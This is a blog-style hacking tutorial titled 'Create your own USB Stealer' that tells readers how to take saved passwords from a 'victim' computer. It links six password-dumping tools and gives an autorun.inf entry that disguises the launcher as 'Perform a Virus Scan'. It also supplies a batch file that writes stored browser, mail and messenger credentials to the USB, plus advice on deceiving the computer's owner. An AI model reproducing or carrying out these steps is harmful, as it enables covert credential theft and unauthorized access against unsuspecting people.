Hi friends, Today I am posting "Create your own USB Stealer". With this trick you can get all type of Passwords from victim computer.Just Follow the following steps and insert your USB into any computer from whom you want to get Passwords and finally you will get the Passwords...........
Note: Through this trick you can only get those Passwords which are stored in Internet Explorer,Firefox and any Messengers and also Mail Passwords.
1) Download all the 6 software.
i) http://www.mediafire.com/?axxhi5n038xl6l6
ii) http://www.mediafire.com/?j8gkzjeadbk88xs
iii) http://www.mediafire.com/?p8qi2guyaycd79u
iv) http://www.mediafire.com/?h0682kn77w5hf32
v) http://www.mediafire.com/?pm3q7su7isz586h
vi) http://www.mediafire.com/?delttr6sauh6con
software are
2) Extract all the .zip files and you will see all the extracted file and copy all the .exe file to your USB drive i.e iepv.exe , mailpv.exe ,mspass.exe,passwordfox.exe,pspv.exe and whoistd.exe
Note: Don't copy the help file only .exe file as shown below
3) Now Open Notepad and Copy the following code into it.
ACTION= Perform a Virus Scan
and save it as autorun.inf into your USB location.
4) Now Open another Notepad and Copy the following code and Paste into it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
and Save it as lunch.bat into your USB location.
5) Your are done. Now Insert your USB into victim Computer.
There are 3 Way to get password easily.(You will use only one method)
i) If Your victim Computer Operating System is XP then when you will insert your USB a Autorun box will be apear and Select the 1st Opetion which is "Perform a Virus Scan". It does not Scan his/her Computer and Run lunch.bat file because we make autorun with Action of Perform a virus Scan.
ii) If your victim Computer Operating System is Windows 7 or Vista then you will see a Autorun box but you don't see the 1st Option "Perform a Virus Scan" , So Now you will directly run lunch.bat file by double click on lunch.bat file in your USB as Show below.
iii) The 3rd way is for all Operating system and it is easy way.
First Goto Start and Click on Run.
Paste the following code into Run Window and Click on ok.
Note: 'g' is the USB location if your usb location change then replace it with your e.g if your USB location is 'h' then it will be h:\lunch.bat.
You are almost done and Password from your Victim PC has been stored to your USB and Remove your USB from Computer.
Note: When you are doing this see your victim computer owner is not with you and if he/she is setting with you then tell him that i will fast your PC with this trick or say something else.
6) In this step you will see you hack or steal Password of victim PC. Insert USB into your own PC and you will see some .txt files i.e iepv.txt, mailpv.txt ,mspass.txt,passwordfox.txt,pspv.txt and whoistd.txt.
Now open it and you will see the Passwords.
and this is 1 .txt file I open as you see below.
If you have any Problem then mention it in Comment.
The Bangash Hacker
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